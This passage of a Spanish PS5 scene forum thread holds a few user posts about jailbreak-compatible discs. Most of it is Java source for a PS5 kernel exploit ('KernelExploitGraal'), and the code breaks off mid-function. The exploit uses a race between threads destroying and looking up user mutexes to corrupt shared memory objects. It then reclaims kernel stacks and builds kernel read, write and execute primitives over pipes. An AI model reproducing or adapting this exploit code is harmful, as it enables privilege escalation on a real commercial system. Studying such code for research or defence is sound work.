› Foros › PlayStation 5 › General
mariokasas escribió:ese ultimo listado es de los backups de ps5? se pueden comseguir por algun sitio.?
DoctaIgnorantia escribió:Hilo dedicado a los avances de la scene de PS5.
Por favor, evitemos comentarios que no estén relacionados con el propósito principal del hilo.
Hilo de off-topic: [OFF-TOPIC] Scene de PS5
Listado de juegos en BluRay que se pueden ejecutar en una PS5-JB (ordenados por versión de FW):
List of game disks that will run on a jailbroken PS5
runouri escribió:DoctaIgnorantia escribió:Hilo dedicado a los avances de la scene de PS5.
Por favor, evitemos comentarios que no estén relacionados con el propósito principal del hilo.
Hilo de off-topic: [OFF-TOPIC] Scene de PS5
Listado de juegos en BluRay que se pueden ejecutar en una PS5-JB (ordenados por versión de FW):
List of game disks that will run on a jailbroken PS5
Buenas Dogtal
una cosilla (luego lo borro que se que o se admiten comentarios y no aporto nada) podrías poner que es lo que hace o que podría permitir el jailbreak o los otros exploits, o en su defecto donde leer sobre ello?
Estoy leyendo este post y no entiendo nada (luego googlea re, pero sería más cómodo ara todos)
gracias
package org.exploit;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.atomic.AtomicLong;
import java.util.Arrays;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Set;
import org.bootstrap.Log;
import org.bootstrap.LogHandler;
import org.exploit.libs.LibKernel;
import org.exploit.structs.Cpuset;
import org.exploit.structs.IoVec;
import org.exploit.structs.RtPrio;
import org.exploit.structs.TimeVal;
import org.exploit.structs.Uio;
class KernelExploitGraal implements KernelExploit {
// Configuration.
private static final boolean dumpKernelStackPartially = false;
private static final boolean dumpKernelStackOfReclaimThread = false;
private static final boolean dumpKernelStackPointers = false;
private static final boolean toggleSetThreadPriorities = false;
private static final boolean toggleEnableThreadPriorityForReclaimThreads = false;
private static final boolean toggleStoppingWorkingThreadsBeforeRemap = true;
private static final boolean toggleReclaimCpuAffinityMask = true;
private static final boolean toggleUnmappingOnFailure = false;
private static final boolean toggleBlockingSelect = true;
// Common parameters.
private static final int MAX_EXPLOITATION_ATTEMPTS = 100000;
private static final int MAX_SHARED_MEMORY_KEYS = 3;
private static final int MAX_DUMMY_SHARED_MEMORY_OBJECTS = 0;
private static final int MAX_DESTROYER_THREADS = 2;
private static final int MAX_RECLAIM_THREADS = 20;
private static final int MAX_RECLAIM_SYSTEM_CALLS = 1; // For `ioctl` method instead of `select`
private static final int MAX_SEARCH_LOOP_INVOCATIONS = toggleBlockingSelect ? 2 : 32;
private static final int MAX_EXTRA_USER_MUTEXES = 1;
private static final int MAX_DESCRIPTORS = 1000;
// Amounts of milliseconds we need to wait at different steps.
private static final long INITIAL_WAIT_PERIOD = 50; // 50
private static final long KERNEL_STACK_WAIT_PERIOD = toggleBlockingSelect ? 100 : 250; // 50/250
private static final long TINY_WAIT_PERIOD = 50; // 50
// Special marker to determine victim thread's ID.
private static final int RECLAIM_THREAD_MARKER_BASE = 0x00414141;
// Special number that multiplies with file descriptor number to get shared memory
// object size. Having this size we can figure out descriptor of shared memory
// object that uses dangling pointer.
private static final int MAGIC_NUMBER = 0x1000;
// Buffer size for thread marker, it should not be larger than `SYS_IOCTL_SMALL_SIZE`,
// otherwise `sys_ioctl` will use heap as storage instead of stack.
private static final int THREAD_MARKER_BUFFER_SIZE = Constants.SYS_IOCTL_SMALL_SIZE;
// State size for reclaim threads.
private static final int MARKER_SIZE = toggleBlockingSelect ? 8 : THREAD_MARKER_BUFFER_SIZE;
private static final int STATE_SIZE = 2 * MARKER_SIZE;
// Pinned cores for each type of created threads.
private static Cpuset MAIN_THREAD_CORES = new Cpuset(0);
private static Cpuset[] DESTROYER_THREAD_CORES = new Cpuset[] { new Cpuset(1), new Cpuset(2) };
private static Cpuset LOOKUP_THREAD_CORES = new Cpuset(3);
// Priorities for such threads. `RTP_PRIO_FIFO` should also work.
private static RtPrio MAIN_THREAD_PRIORITY = new RtPrio((short)Constants.RTP_PRIO_REALTIME, (short)256);
private static RtPrio DESTROYER_THREAD_PRIORITY = new RtPrio((short)Constants.RTP_PRIO_REALTIME, (short)256); // 256
private static RtPrio LOOKUP_THREAD_PRIORITY = new RtPrio((short)Constants.RTP_PRIO_REALTIME, (short)767); // 767, 400
private static RtPrio RECLAIM_THREAD_PRIORITY = new RtPrio((short)Constants.RTP_PRIO_REALTIME, (short)450); // 450
// Number of times kernel thread's heap pointer should occur in kernel stack to
// distinguish it from other values on stack.
private static int KERNEL_THREAD_POINTER_OCCURRENCE_THRESHOLD = 10;
// Max length of reclaim thread name.
private static int MAX_RECLAIM_THREAD_NAME_SIZE = 0x10;
// Supported commands.
private static final int CMD_NOOP = 0;
private static final int CMD_READ = 1;
private static final int CMD_WRITE = 2;
private static final int CMD_EXEC = 3;
private static final int CMD_EXIT = 4;
//-------------------------------------------------------------------------
private static final Api api = Api.getInstance();
//-------------------------------------------------------------------------
private abstract static class CommonJob implements Runnable {
protected String jobName;
public void run() {
prepare();
work();
postprocess();
}
protected void prepare() {
// XXX: Setting name through `setName` method or constructor does not work for some reason.
ThreadUtil.pthreadSetCurrentThreadName(jobName);
}
protected void work() {
Thread.yield();
}
protected void postprocess() {
}
public String getJobName() {
return jobName;
}
}
//-------------------------------------------------------------------------
private class DestroyerJob extends CommonJob {
private int index;
public DestroyerJob(int index) {
this.index = index;
this.jobName = "destroyer#" + index;
}
protected void prepare() {
super.prepare();
// Move destroyer thread to separate core.
if (!ThreadUtil.setCurrentThreadCpuAffinity(DESTROYER_THREAD_CORES[index])) {
throw Log.error("Setting CPU affinity mask for '" + jobName + "' failed");
}
if (toggleSetThreadPriorities) {
// Set destroyer thread's priority, so it will run before lookup thread.
if (!ThreadUtil.setCurrentThreadPriority(DESTROYER_THREAD_PRIORITY)) {
throw Log.error("Setting priority for thread '" + jobName + "' failed");
}
}
}
protected void work() {
while (!raceDoneFlag.get()) {
Log.debug("[" + jobName + "] Starting loop");
Log.debug("[" + jobName + "] Waiting for ready flag");
while (!readyFlag.get()) {
Thread.yield();
}
// Notify main thread that destroyer thread's loop is ready to start.
numReadyThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for destroy flag");
while (!destroyFlag.get()) {
Thread.yield();
}
// Trigger destroying of primary user mutex and check for result.
if (KernelHelper.destroyUserMutex(primarySharedMemoryKeyAddress)) {
// Notify that destroy was successful.
numDestructions.incrementAndGet();
} else {
Log.debug("[" + jobName + "] Performing destroy operation failed");
}
// Notify that destroyer thread done its main job.
numCompletedThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for check done flag");
while (!checkDoneFlag.get()) {
Thread.yield();
}
// Notify main thread that destroyer thread is ready to finish.
numReadyThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for done flag");
while (!doneFlag.get()) {
Thread.yield();
}
// Notify main thread that destroyer thread's loop was finished.
numFinishedThreads.incrementAndGet();
}
// Racing done, waiting for others.
Log.debug("[" + jobName + "] Waiting for destroy flag");
while (!destroyFlag.get()) {
Thread.yield();
}
Log.debug("[" + jobName + "] Finishing loop");
}
}
//-------------------------------------------------------------------------
private class LookupJob extends CommonJob {
public LookupJob() {
jobName = "lookup";
}
protected void prepare() {
super.prepare();
// Move lookup thread to separate core.
if (!ThreadUtil.setCurrentThreadCpuAffinity(LOOKUP_THREAD_CORES)) {
throw Log.error("Setting CPU affinity mask for '" + jobName + "' failed");
}
if (toggleSetThreadPriorities) {
// Set lookup thread's priority, so it will run after destroyer threads.
if (!ThreadUtil.setCurrentThreadPriority(LOOKUP_THREAD_PRIORITY)) {
throw Log.error("Setting priority for thread '" + jobName + "' failed");
}
}
}
protected void work() {
while (!raceDoneFlag.get()) {
Log.debug("[" + jobName + "] Starting loop");
Log.debug("[" + jobName + "] Waiting for ready flag");
while (!readyFlag.get()) {
Thread.yield();
}
// Notify main thread that lookup thread's loop is ready to start.
numReadyThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for destroy flag");
while (!destroyFlag.get()) {
Thread.yield();
}
// Trigger lookup of primary user mutex and check for result.
final int descriptor = KernelHelper.lookupUserMutex(primarySharedMemoryKeyAddress);
if (descriptor != -1) {
lookupDescriptor = descriptor;
Log.debug("[" + jobName + "] Lookup descriptor of primary shared memory object: " + descriptor);
} else {
Log.debug("[" + jobName + "] Performing lookup operation failed");
}
// Notify that lookup thread done its main job.
numCompletedThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for check done flag");
while (!checkDoneFlag.get()) {
Thread.yield();
}
// Notify main thread that lookup thread is ready to finish.
numReadyThreads.incrementAndGet();
Log.debug("[" + jobName + "] Waiting for done flag");
while (!doneFlag.get()) {
Thread.yield();
}
// Notify main thread that lookup thread's loop was finished.
numFinishedThreads.incrementAndGet();
}
Log.debug("[" + jobName + "] Waiting for destroy flag");
while (!destroyFlag.get()) {
Thread.yield();
}
Log.debug("[" + jobName + "] Finishing loop");
}
}
//-------------------------------------------------------------------------
private class ReclaimJob extends CommonJob {
private final int index;
private final int marker;
private final long markerAddress;
private final long markerCopyAddress;
private Cpuset initialCpuAffinity;
private boolean isTarget;
private AtomicInteger currentCommand;
private AtomicBoolean commandWaitFlag;
private AtomicLong commandArg1;
private AtomicLong commandArg2;
private AtomicLong commandArg3;
private AtomicLong commandResult;
private AtomicInteger commandErrNo;
private Runnable commandRunnable;
public ReclaimJob(int index) {
this.index = index;
this.jobName = "reclaim#" + index;
this.marker = RECLAIM_THREAD_MARKER_BASE | ((0x41 + index + 1) << 24);
this.markerAddress = reclaimJobStatesAddress + index * STATE_SIZE;
this.markerCopyAddress = this.markerAddress + MARKER_SIZE;
this.isTarget = false;
}
protected void prepare() {
super.prepare();
initialCpuAffinity = ThreadUtil.getCurrentThreadCpuAffinity();
//Log.debug("Initial CPU affinity of '" + jobName + "' = " + initialCpuAffinity.getIndices().toString());
if (toggleReclaimCpuAffinityMask) {
if (!ThreadUtil.setCurrentThreadCpuAffinity(DESTROYER_THREAD_CORES[destroyerThreadIndex])) {
throw Log.error("Setting CPU affinity mask for '" + jobName + "' failed");
}
}
if (toggleSetThreadPriorities && toggleEnableThreadPriorityForReclaimThreads) {
if (!ThreadUtil.setCurrentThreadPriority(RECLAIM_THREAD_PRIORITY)) {
throw Log.error("Setting priority for thread '" + jobName + "' failed");
}
}
// Prepare thread marker which will be used to determine victim thread ID: 41 41 41 [41 + index]
if (toggleBlockingSelect) {
api.write64(markerAddress, TypeUtil.toUnsignedLong(marker) << 32);
} else {
final int count = MathUtil.divideUnsigned(THREAD_MARKER_BUFFER_SIZE, 4);
for (int i = 0; i < count; i++) {
api.write32(markerAddress + i * 0x4, marker);
}
}
}
protected void work() {
//Log.debug("[" + jobName + "] Waiting for ready flag");
while (!readyFlag.get()) {
Thread.yield();
}
//Log.debug("[" + jobName + "] Starting loop");
// Wait loop that runs until kernel stack is obtained.
while (!destroyFlag.get()) {
//Log.debug("[" + jobName + "] Doing blocking call");
if (toggleBlockingSelect) {
// Use copy of marker because `select` may overwrite its contents.
api.copyMemory(markerCopyAddress, markerAddress, MARKER_SIZE);
LibKernel.select(1, markerCopyAddress, 0, 0, timeoutAddress);
} else {
final int fakeDescriptor = 0xBEEF;
for (int i = 0; i < MAX_RECLAIM_SYSTEM_CALLS; i++) {
LibKernel.ioctl(fakeDescriptor, Helpers.IOW(0, 0, THREAD_MARKER_BUFFER_SIZE), markerAddress);
}
}
Thread.yield();
// Check if leaked kernel stack belongs to this thread.
if (isTarget) {
Log.debug("[" + jobName + "] I am lucky");
if (toggleReclaimCpuAffinityMask) {
if (!ThreadUtil.setCurrentThreadCpuAffinity(initialCpuAffinity)) {
throw Log.error("Setting CPU affinity mask for '" + jobName + "' failed");
}
}
break;
}
}
//Log.debug("[" + jobName + "] Finishing loop");
if (isTarget) {
Log.debug("[" + jobName + "] Waiting for ready flag");
while (!readyFlag.get()) {
Thread.yield();
}
// Lock execution temporarily using blocking call by reading from empty pipe.
Log.debug("[" + jobName + "] Reading from read pipe #" + readPipeDescriptor);
final long result = LibKernel.read(readPipeDescriptor, pipeBufferAddress, Api.MAX_PIPE_BUFFER_SIZE);
Log.debug("[" + jobName + "] Reading from read pipe #" + readPipeDescriptor + " finished with result " + TypeUtil.int64ToHex(result));
if (result == Api.MAX_PIPE_BUFFER_SIZE) {
Log.debug("[" + jobName + "] Starting command processor loop");
handleCommands();
Log.debug("[" + jobName + "] Stopping command processor loop");
} else if (result == -1L) {
api.warnMethodFailedPosix("read");
} else {
Log.warn("Unexpected result after reading from pipe " + TypeUtil.int64ToHex(result));
}
} else {
//Log.debug("[" + jobName + "] Not target thread");
}
}
public boolean unlockPipe() {
// Occupy pipe buffer by writing to it, thus unlock execution of reclaim thread.
Log.debug("[" + jobName + "] Writing to write pipe #" + writePipeDescriptor);
final long result = LibKernel.write(writePipeDescriptor, pipeBufferAddress, Api.MAX_PIPE_BUFFER_SIZE);
Log.debug("[" + jobName + "] Writing to write pipe #" + writePipeDescriptor + " finished with result " + TypeUtil.int64ToHex(result));
if (result == -1L) {
api.warnMethodFailedPosix("write");
return false;
} else if (result != Api.MAX_PIPE_BUFFER_SIZE) {
Log.debug("Unexpected result after writing to pipe " + TypeUtil.int64ToHex(result));
return false;
}
return true;
}
public boolean isCommandProccesorRunning() {
return currentCommand != null && currentCommand.get() != CMD_EXIT;
}
private void handleCommands() {
commandWaitFlag = new AtomicBoolean(false);
commandArg1 = new AtomicLong(0);
commandArg2 = new AtomicLong(0);
commandArg3 = new AtomicLong(0);
commandResult = new AtomicLong(0);
commandErrNo = new AtomicInteger(0);
// Must be initialized last.
currentCommand = new AtomicInteger(CMD_NOOP);
while (true) {
final int cmd = currentCommand.get();
if (cmd != CMD_NOOP) {
currentCommand.set(CMD_NOOP);
commandResult.set(-1L);
commandErrNo.set(0);
switch (cmd) {
case CMD_READ:
//Log.debug("[" + jobName + "] Processing read command");
handleCommandRead(commandArg1.get(), commandArg2.get(), commandArg3.get());
//Log.debug("[" + jobName + "] Done processing read command");
break;
case CMD_WRITE:
//Log.debug("[" + jobName + "] Processing write command");
handleCommandWrite(commandArg1.get(), commandArg2.get(), commandArg3.get());
//Log.debug("[" + jobName + "] Done processing write command");
break;
case CMD_EXEC:
//Log.debug("[" + jobName + "] Processing exec command");
handleCommandExec();
//Log.debug("[" + jobName + "] Done processing exec command");
break;
default:
throw Log.error("[" + jobName + "] Unsupported command: " + cmd);
}
commandWaitFlag.set(false);
}
Thread.yield();
}
}
private void handleCommandRead(long srcAddress, long dstAddress, long size) {
//Log.debug("[" + jobName + "] Doing blocking write");
Thread.yield();
// Do blocking write pipe call.
final long result = LibKernel.write(writePipeDescriptor, pipeBufferAddress, size);
//Log.debug("[" + jobName + "] Finishing blocking write");
commandResult.set(result);
commandErrNo.set(api.getLastErrNo());
}
private void handleCommandWrite(long srcAddress, long dstAddress, long size) {
//Log.debug("[" + jobName + "] Doing blocking read");
Thread.yield();
// Do blocking read pipe call.
final long result = LibKernel.read(readPipeDescriptor, pipeBufferAddress, size);
//Log.debug("[" + jobName + "] Finishing blocking read");
commandResult.set(result);
commandErrNo.set(api.getLastErrNo());
}
private void handleCommandExec() {
if (commandRunnable != null) {
commandRunnable.run();
commandRunnable = null;
}
}
public void setTarget(boolean flag) {
isTarget = flag;
}
public boolean isTarget() {
return isTarget;
}
public int getCommand() {
return currentCommand.get();
}
public void setCommand(int cmd) {
Checks.ensureTrue(cmd >= CMD_NOOP && cmd <= CMD_EXIT);
currentCommand.set(cmd);
}
public boolean getCommandWaitFlag() {
return commandWaitFlag.get();
}
public void setCommandWaitFlag(boolean flag) {
commandWaitFlag.set(flag);
}
public long getCommandArg(int index) {
Checks.ensureTrue(index >= 0 && index <= 2);
switch (index) {
case 0:
return commandArg1.get();
case 1:
return commandArg2.get();
case 2:
return commandArg3.get();
default:
return 0;
}
}
public void setCommandArg(int index, long arg) {
Checks.ensureTrue(index >= 0 && index <= 2);
switch (index) {
case 0:
commandArg1.set(arg);
break;
case 1:
commandArg2.set(arg);
break;
case 2:
commandArg3.set(arg);
break;
}
}
public long getCommandResult() {
return commandResult.get();
}
public int getCommandErrNo() {
return commandErrNo.get();
}
public void setCommandRunnable(Runnable runnable) {
commandRunnable = runnable;
}
}
//-------------------------------------------------------------------------
private long scratchBufferAddress;
private long pipeBufferAddress;
private long ioVecAddress;
private long uioAddress;
private long primarySharedMemoryKeyAddress;
private long secondarySharedMemoryKeyAddress;
private long extraSharedMemoryKeyAddress;
private long statAddress;
private long timeoutAddress;
private long markerPatternAddress;
private long threadNameAddress;
private long reclaimJobStatesAddress;
private List<Thread> destroyerThreads;
private Thread lookupThread;
private List<Runnable> reclaimJobs;
private List<Thread> reclaimThreads;
private ReclaimJob targetReclaimJob;
private Thread targetReclaimThread;
private AtomicBoolean raceDoneFlag;
private AtomicBoolean readyFlag;
private AtomicBoolean destroyFlag;
private AtomicBoolean checkDoneFlag;
private AtomicBoolean doneFlag;
private AtomicInteger numReadyThreads;
private AtomicInteger numCompletedThreads;
private AtomicInteger numFinishedThreads;
private AtomicInteger numDestructions;
private int pipeBufferCapacity;
private int readPipeDescriptor;
private int writePipeDescriptor;
private int initialOriginalDescriptor;
private int originalDescriptor;
private int lookupDescriptor;
private int winnerDescriptor;
private int[] reclaimDescriptors;
private int destroyerThreadIndex;
private Set<Integer> usedDescriptors;
private Set<Long> mappedKernelStackAddresses;
private long mappedReclaimKernelStackAddress;
private MemoryBuffer stackDataBuffer;
private IoVec ioVec;
private Uio uio;
private boolean exploited;
public KernelExploitGraal() {
assert DESTROYER_THREAD_CORES.length == MAX_DESTROYER_THREADS;
}
//-------------------------------------------------------------------------
public int run(LogHandler debugLogHandler) {
if (!prepareExploit()) {
Log.warn("Preparing for exploitation failed");
return -1;
}
boolean exploited = false;
int i = 0;
for (; i < MAX_EXPLOITATION_ATTEMPTS; i++) {
if (initialExploit()) {
// XXX: We can debug post-exploitation only because initial exploitation with verbose logging takes a lot of time.
int oldSeverity = -1;
if (debugLogHandler != null) {
oldSeverity = debugLogHandler.setVerbosityLevel(Log.DEBUG);
}
Log.info("Doing post-exploitation");
if (postExploit()) {
exploited = true;
} else {
Log.warn("Post-exploitation failed");
}
if (debugLogHandler != null) {
debugLogHandler.setVerbosityLevel(oldSeverity);
}
} else {
Log.warn("Exploitation attempt #" + i + " failed");
}
if (exploited) {
break;
}
// Force kick of garbage collector.
System.gc();
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
}
return exploited ? (i + 1) : 0;
}
//-------------------------------------------------------------------------
private boolean prepareExploit() {
//
// Prepare scratch buffer and auxiliary things.
//
pipeBufferCapacity = api.getPipeBufferCapacity();
final int scratchBufferSize = pipeBufferCapacity + Offsets.sizeOf_iovec + Offsets.sizeOf_uio + Offsets.sizeOf_pipebuf * 2 + MAX_SHARED_MEMORY_KEYS * 8 + Offsets.sizeOf_stat + Offsets.sizeOf_timeval + 0x8 + MAX_RECLAIM_THREAD_NAME_SIZE + STATE_SIZE * MAX_RECLAIM_THREADS;
scratchBufferAddress = api.allocateMemory(scratchBufferSize);
pipeBufferAddress = scratchBufferAddress + 0x0;
ioVecAddress = pipeBufferAddress + pipeBufferCapacity;
uioAddress = ioVecAddress + Offsets.sizeOf_iovec;
primarySharedMemoryKeyAddress = uioAddress + Offsets.sizeOf_uio;
secondarySharedMemoryKeyAddress = primarySharedMemoryKeyAddress + 0x8;
extraSharedMemoryKeyAddress = secondarySharedMemoryKeyAddress + 0x8;
statAddress = extraSharedMemoryKeyAddress + 0x8;
timeoutAddress = statAddress + Offsets.sizeOf_stat;
markerPatternAddress = timeoutAddress + Offsets.sizeOf_timeval;
threadNameAddress = markerPatternAddress + 0x8;
reclaimJobStatesAddress = threadNameAddress + MAX_RECLAIM_THREAD_NAME_SIZE;
raceDoneFlag = new AtomicBoolean();
readyFlag = new AtomicBoolean();
destroyFlag = new AtomicBoolean();
checkDoneFlag = new AtomicBoolean();
doneFlag = new AtomicBoolean();
numReadyThreads = new AtomicInteger();
numCompletedThreads = new AtomicInteger();
numFinishedThreads = new AtomicInteger();
numDestructions = new AtomicInteger();
initialOriginalDescriptor = -1;
originalDescriptor = -1;
lookupDescriptor = -1;
winnerDescriptor = -1;
reclaimDescriptors = new int[MAX_DESTROYER_THREADS];
for (int i = 0; i < reclaimDescriptors.length; i++) {
reclaimDescriptors[i] = -1;
}
destroyerThreadIndex = -1;
usedDescriptors = new HashSet<Integer>();
mappedKernelStackAddresses = new HashSet<Long>();
mappedReclaimKernelStackAddress = 0;
ioVec = new IoVec();
uio = new Uio();
api.write32(markerPatternAddress, RECLAIM_THREAD_MARKER_BASE);
//
// Create pipe to use for kernel primitives.
//
Log.debug("Creating pipe for kernel primitives");
final int[] pipe = KernelHelper.createPipe();
if (pipe == null) {
Log.warn("Creating pipe for kernel primitives failed");
return false;
}
readPipeDescriptor = pipe[0];
Log.debug("Descriptor of read pipe: " + readPipeDescriptor);
writePipeDescriptor = pipe[1];
Log.debug("Descriptor of write pipe: " + writePipeDescriptor);
//
// Prepare dummy shared memory objects (if needed).
//
final int[] dummyDescriptors = new int[MAX_DUMMY_SHARED_MEMORY_OBJECTS];
final long mappedSize = Constants.KERNEL_STACK_SIZE;
for (int i = 0; i < dummyDescriptors.length; i++) {
Log.debug("Creating dummy shared memory object #" + i);
int descriptor = KernelHelper.createSharedMemoryAnonymous();
if (descriptor != -1) {
Log.debug("Descriptor of dummy shared memory object #" + i + ": " + descriptor);
Log.debug("Truncating dummy shared memory object #" + i);
if (KernelHelper.truncateSharedMemory(descriptor, mappedSize)) {
Log.debug("Mapping memory of dummy shared memory object #" + i);
final long address = KernelHelper.mapMemoryWithDescriptor(0, mappedSize, descriptor, 0);
if (address != 0L) {
Log.debug("Touching dummy shared memory object #" + i + " at " + TypeUtil.int64ToHex(address));
api.write32(address, i);
dummyDescriptors[i] = descriptor;
descriptor = -1;
Log.debug("Unmapping memory of dummy shared memory object #" + i);
if (!KernelHelper.unmapMemory(address, mappedSize)) {
Log.warn("Unmapping memory of dummy shared memory object #" + i + " failed");
}
} else {
Log.warn("Mapping memory of dummy shared memory object #" + i + " failed");
}
} else {
Log.warn("Truncating dummy shared memory object #" + i + " failed");
}
if (descriptor != -1) {
Log.debug("Closing descriptor #" + descriptor + " of dummy shared memory object #" + i);
if (!KernelHelper.closeDescriptor(descriptor)) {
Log.warn("Closing descriptor #" + descriptor + " of dummy shared memory object #" + i + " failed");
}
dummyDescriptors[i] = -1;
}
} else {
Log.warn("Creating dummy shared memory object #" + i + " failed");
return false;
}
}
for (int i = 0; i < dummyDescriptors.length; i++) {
final int descriptor = dummyDescriptors[i];
if (descriptor == -1) {
continue;
}
Log.debug("Closing descriptor #" + descriptor + " of dummy shared memory object #" + i);
if (!KernelHelper.closeDescriptor(descriptor)) {
Log.warn("Closing descriptor #" + descriptor + " of dummy shared memory object #" + i + " failed");
}
dummyDescriptors[i] = -1;
}
//
// Initial set up of threads.
//
destroyerThreads = new ArrayList<Thread>();
reclaimJobs = new ArrayList<Runnable>();
reclaimThreads = new ArrayList<Thread>();
// Set moderate timeout to avoid locks.
final TimeVal timeout = new TimeVal(0, 500000); // 0.5 seconds = 500000 microseconds
timeout.serialize(timeoutAddress);
if (!ThreadUtil.setCurrentThreadCpuAffinity(MAIN_THREAD_CORES)) {
Log.warn("Pinning main thread to specific core failed");
return false;
}
if (toggleSetThreadPriorities) {
if (!ThreadUtil.setCurrentThreadPriority(MAIN_THREAD_PRIORITY)) {
Log.warn("Setting priority for main thread failed");
return false;
}
}
return true;
}
private void resetState() {
raceDoneFlag.set(false);
readyFlag.set(false);
destroyFlag.set(false);
checkDoneFlag.set(false);
doneFlag.set(false);
numReadyThreads.set(0);
numCompletedThreads.set(0);
numFinishedThreads.set(0);
numDestructions.set(0);
originalDescriptor = -1;
lookupDescriptor = -1;
winnerDescriptor = -1;
for (int i = 0; i < reclaimDescriptors.length; i++) {
reclaimDescriptors[i] = -1;
}
destroyerThreadIndex = -1;
}
private void cleanupState() {
for (int i = 0; i < reclaimDescriptors.length; i++) {
final int descriptor = reclaimDescriptors[i];
if (descriptor == -1) {
continue;
}
Log.debug("[main] Closing descriptor #" + descriptor + " of reclaim shared memory object #" + i);
if (!KernelHelper.closeDescriptor(descriptor)) {
Log.debug("[main] Closing descriptor #" + descriptor + " of reclaim shared memory object #" + i + " failed");
}
reclaimDescriptors[i] = -1;
}
if (lookupDescriptor != -1) {
Log.debug("[main] Closing lookup descriptor #" + lookupDescriptor + " of primary shared memory object");
if (!KernelHelper.closeDescriptor(lookupDescriptor)) {
Log.debug("[main] Closing lookup descriptor #" + lookupDescriptor + " of primary shared memory object failed");
}
lookupDescriptor = -1;
}
Log.debug("[main] Attempting to destroy secondary user mutex");
if (KernelHelper.destroyUserMutex(secondarySharedMemoryKeyAddress)) {
Log.debug("[main] Attempting to destroy secondary user mutex unexpectedly succeeded");
}
Log.debug("[main] Attempting to destroy primary user mutex");
if (KernelHelper.destroyUserMutex(primarySharedMemoryKeyAddress)) {
Log.debug("[main] Attempting to destroy primary user mutex unexpectedly succeeded");
}
}
private int checkForCorruption() {
if (originalDescriptor == -1) {
Log.debug("[main] Original descriptor of primary shared memory object not found");
return -1;
}
Log.debug("[main] Original descriptor of primary shared memory object: " + originalDescriptor);
if (lookupDescriptor == -1) {
Log.debug("[main] Lookup descriptor of primary shared memory object not found");
return -1;
}
Log.debug("[main] Lookup descriptor of primary shared memory object: " + lookupDescriptor);
usedDescriptors.add(new Integer(lookupDescriptor));
final long size = KernelHelper.getFileSize(lookupDescriptor, statAddress);
if (size == -1L) {
Log.debug("[main] Getting size of primary shared memory object failed");
return -1;
}
Log.debug("[main] Size of primary shared memory object: " + TypeUtil.int64ToHex(size));
final int descriptor = (int)MathUtil.divideUnsigned(size, MAGIC_NUMBER);
if (descriptor > MAX_DESCRIPTORS) {
Log.debug("[main] Calculated descriptor is too large: #" + descriptor);
return -1;
}
Log.debug("[main] Calculated descriptor #" + descriptor);
if (descriptor != originalDescriptor && descriptor != lookupDescriptor) {
Log.debug("[main] Got mismatch of descriptors!");
return descriptor;
}
return -1;
}
private boolean initialExploit() {
stackDataBuffer = null;
resetState();
//
// Prepare destroyer, lookup and reclaim threads.
//
Log.debug("Creating destroyer threads");
for (int i = 0; i < MAX_DESTROYER_THREADS; i++) {
//Log.debug("Creating destroyer thread #" + i);
final Thread thread = new Thread(new DestroyerJob(i));
destroyerThreads.add(thread);
}
Log.debug("Creating lookup thread");
lookupThread = new Thread(new LookupJob());
for (int i = 0; i < MAX_DESTROYER_THREADS; i++) {
final Thread thread = destroyerThreads.get(i);
//Log.debug("Starting destroyer thread #" + i);
thread.start();
}
Log.debug("Starting lookup thread");
lookupThread.start();
Log.debug("Creating reclaim threads");
for (int i = 0; i < MAX_RECLAIM_THREADS; i++) {
//Log.debug("Creating reclaim thread #" + i);
final Runnable runnable = new ReclaimJob(i);
reclaimJobs.add(runnable);
final Thread thread = new Thread(runnable);
reclaimThreads.add(thread);
}
ThreadUtil.sleepMs(INITIAL_WAIT_PERIOD);
//
// Initial exploitation that does memory corruption.
//
Log.debug("[main] Resetting state");
resetState();
int numIterations = 0;
while (!raceDoneFlag.get()) {
Log.debug("[main] Starting loop");
Log.debug("[main] Creating primary user mutex");
int descriptor = KernelHelper.createUserMutex(primarySharedMemoryKeyAddress);
if (descriptor == -1) {
throw Log.error("[main] Creating primary user mutex failed");
}
Log.debug("[main] Original descriptor of primary shared memory object: " + descriptor);
originalDescriptor = descriptor;
if (initialOriginalDescriptor == -1) {
initialOriginalDescriptor = descriptor;
}
// Set size of primary shared memory object, so we can find its descriptor later (see comments for `MAGIC_NUMBER`).
Log.debug("[main] Truncating primary shared memory object");
if (!truncateSharedMemorySpecial(descriptor)) {
throw Log.error("[main] Truncating primary shared memory object failed");
}
// Close this descriptor to decrement reference counter of primary shared memory object.
Log.debug("[main] Closing original descriptor #" + descriptor + " of primary shared memory object");
if (!KernelHelper.closeDescriptor(descriptor)) {
throw Log.error("Closing original descriptor #" + descriptor + " of primary shared memory object failed");
}
Log.debug("[main] We are ready to start");
// Notify other threads that we are ready to start.
readyFlag.set(true);
// Wait for other threads to be ready.
waitForCounter(numReadyThreads, MAX_DESTROYER_THREADS + 1, " threads to be ready"); // Plus one for lookup thread
// Clear `ready` flag, thus no other thread will start its loop again prematurely.
readyFlag.set(false);
// Reset `ready` counter to reuse it during cleaning step.
numReadyThreads.set(0);
// Notify destroyer threads that they should attempt to destroy primary shared memory object.
destroyFlag.set(true);
// Wait until other threads will do their main job.
waitForCounter(numCompletedThreads, MAX_DESTROYER_THREADS + 1, " threads to be completed"); // Plus one for lookup thread
final int count = numDestructions.get();
Log.debug("[main] Number of successful destructions: " + count);
Log.debug("[main] Spraying and praying");
for (int i = 0; i < reclaimDescriptors.length; i++) {
Log.debug("[main] Switching to destroyer thread #" + i + " core");
if (!ThreadUtil.setCurrentThreadCpuAffinity(DESTROYER_THREAD_CORES[i])) {
throw Log.error("[main] Switching to destroyer thread #" + i + " core failed");
}
Log.debug("[main] Creating secondary user mutex #" + i);
descriptor = KernelHelper.createUserMutex(secondarySharedMemoryKeyAddress);
if (descriptor == -1) {
throw Log.error("[main] Creating secondary user mutex #" + i + " failed");
}
Log.debug("[main] Descriptor of secondary shared memory object #" + i + ": " + descriptor);
reclaimDescriptors[i] = descriptor;
Log.debug("[main] Truncating secondary shared memory object #" + i);
if (!truncateSharedMemorySpecial(descriptor)) {
throw Log.error("[main] Truncating secondary shared memory object #" + i + " failed");
}
Log.debug("[main] Destroying secondary user mutex #" + i);
if (!KernelHelper.destroyUserMutex(secondarySharedMemoryKeyAddress)) {
